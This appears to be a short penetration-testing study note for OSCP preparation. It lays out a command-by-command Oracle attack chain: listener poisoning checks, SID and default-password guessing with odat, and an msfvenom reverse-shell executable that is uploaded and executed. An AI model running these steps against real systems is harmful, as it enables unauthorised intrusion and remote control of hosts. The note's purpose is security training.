OSCP Notes

Oracle exploitation:

nmap -Pn -sT --script=./oracle-tns-poison -p 1521 IP
If it's vuln, use odat
  1. 1.
    oda.py sidguesser -s IP -p 1521
  2. 2.
    double check if the system is vuln (if the username is XE)
python3 odat.py tnspoison -s IP -d XE --test-modul
3. obtain creds
python3 odat.py passwordguesser -s IP -p 1521 --accounts-file oracle_default_userpass.txt -d XE
4. once you find creds, you can now upload malicious files!
generate it with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f exe > gori.exe
Upload with odat.py
python3 odat.py utilfile -s IP -d XE -U USERNAME -P PASSWORD --sysdba -putfile C:/ gori.exe ./gori.exe
Execute the file:
python3 odat.py externaltable -s IP -d XE -U USERNAME -P PASSWORD --sysdba -exec C:/ gori.exe
Last modified 1yr ago